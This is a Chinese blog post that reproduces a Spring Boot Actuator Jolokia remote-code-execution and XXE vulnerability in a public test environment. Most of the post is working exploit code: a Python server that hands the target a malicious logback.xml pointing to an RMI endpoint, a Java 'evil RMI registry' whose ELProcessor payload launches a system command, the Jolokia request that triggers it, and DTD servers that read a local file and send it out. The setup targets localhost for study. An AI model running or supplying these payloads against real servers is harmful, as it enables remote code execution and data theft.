Spring Boot Actuator Jolokia RCE/XXE 复现

2019-03-15 11:26:00 漏洞

https://github.com/artsploit/actuator-testbed

这里老外提供了一个简单的漏洞环境，装好maven直接在目录里打包执行

mvn install
mvn spring-boot:run

漏洞复现

首先做好攻击前的准备。

一个用于执行系统命令的rmi服务
一个中转指向rmi服务的 logback 配置文件

这里我给出我使用的代码

http://127.0.0.1:1337/logback.xml

用于中转给rmi服务

#!/usr/bin/python
# -*- coding:utf-8 -*-
# @Author : b1u3r
# @Time : 2019/1/11 15:28
import tornado.web
import tornado.ioloop


class IndexHandler(tornado.web.RequestHandler):

    def get(self, *args, **kwargs):
        self.write("""<configuration>
  <insertFromJNDI env-entry-name="rmi://127.0.0.1:1097/jndi" as="appName" />
</configuration>""")


application = tornado.web.Application([
    (r'/logback.xml', IndexHandler),
])

if __name__ == "__main__":
    application.listen(1337)
    tornado.ioloop.IOLoop.instance().start()

rmi://127.0.0.1:1097/jndi

用于执行系统命令

/**
 * @author 浅蓝
 * @email [email protected]
 * @since 2019/3/15 10:57
 */
import java.rmi.registry.*;
import com.sun.jndi.rmi.registry.*;
import javax.naming.*;
import org.apache.naming.ResourceRef;

public class Test {
    public static void main(String[] args) throws Exception {
        System.out.println("Creating evil RMI registry on port 1097");
        Registry registry = LocateRegistry.createRegistry(1097);

        //prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
        //redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
        ref.add(new StringRefAddr("forceString", "x=eval"));
        //expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows
        ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','/c','calc']).start()\")"));

        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
        registry.bind("jndi", referenceWrapper);
    }
}

把两个服务都运行起来，确保服务可被访问。

最后启动被攻击的 Spring Boot 服务。

请求payload

http://127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/127.0.0.1:1337!/logback.xml

还可以用作XXE攻击

import tornado.web
import tornado.ioloop


class IndexHandler(tornado.web.RequestHandler):

    def get(self, *args, **kwargs):
        self.write("""<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE a [ <!ENTITY % remote SYSTEM "http://127.0.0.1:8080/file.dtd">%remote;%int;]>
<a>&trick;</a>""")


application = tornado.web.Application([
    (r'/logback.xml', IndexHandler),
])

if __name__ == "__main__":
    application.listen(1337)
    tornado.ioloop.IOLoop.instance().start()

import tornado.web
import tornado.ioloop

class IndexHandler(tornado.web.RequestHandler):

    def get(self, *args, **kwargs):
        self.write("""<!ENTITY % d SYSTEM "file:///D:/hello.txt"> 
<!ENTITY % int "<!ENTITY trick SYSTEM ':%d;'>">""")


application = tornado.web.Application([
    (r'/file.dtd', IndexHandler),
])

if __name__ == "__main__":
    application.listen(8080)
    tornado.ioloop.IOLoop.instance().start()

参考

https://github.com/mpgn/Spring-Boot-Actuator-Exploit

https://lucifaer.com/2019/03/11/Attack Spring Boot Actuator via jolokia Part 1/

https://www.veracode.com/blog/research/exploiting-spring-boot-actuators

漏洞复现

参考

发表留言